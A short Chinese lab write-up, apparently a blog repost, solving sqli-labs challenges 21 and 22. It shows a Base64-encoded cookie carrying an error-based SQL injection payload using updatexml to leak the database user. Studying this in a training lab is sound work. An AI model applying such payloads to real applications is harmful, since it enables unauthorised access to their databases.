sqli-labs第二十一，二十二题 - 走看看

zoukankan html css js c++ java

sqli-labs第二十一，二十二题

直入主题

这一题是在20题的基础上对cookie进行了Base64加密。

BP抓包

正常登录后刷新页面进行抓包

注入单引号

单引号加密后是 Jw==
成功触发错误

从错误信息可以直到还需要闭合一个括号

构造payload

payload：') and updatexml(1,concat(0x7c,user()),1)#
加密：JykgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgweDdjLHVzZXIoKSksMSkj

成功获取用户名

二十二题

解法相同，不过是闭合双引号

查看全文

相关阅读:
在web项目中使用配置文件
 javaFx教程 scene builder 加载第三方jar包
 getResource的两种用法
 tomcat部署工具
 withMisfireHandlingInstruction
quartz教程三
 quartz教程二
 LocalDateTime与DateTimeFormatter
quartz demo
在小程序中点击后跳转到另一个小程序

原文地址：https://www.cnblogs.com/a-qi/p/13545388.html

Copyright © 2011-2022 走看看